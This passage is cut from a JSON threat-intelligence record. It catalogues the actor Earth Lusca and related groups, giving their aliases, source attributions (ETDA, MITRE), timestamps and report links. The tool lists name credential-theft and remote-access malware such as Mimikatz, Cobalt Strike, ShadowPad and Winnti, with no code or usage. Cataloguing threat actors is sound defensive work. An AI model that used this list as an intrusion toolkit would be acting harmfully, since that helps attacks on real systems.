"NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434655, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2059e9884e9b1c429b5ccd41ceefebc54f06d683.pdf", "text": "https://archive.orkl.eu/2059e9884e9b1c429b5ccd41ceefebc54f06d683.txt", "img": "https://archive.orkl.eu/2059e9884e9b1c429b5ccd41ceefebc54f06d683.jpg" } }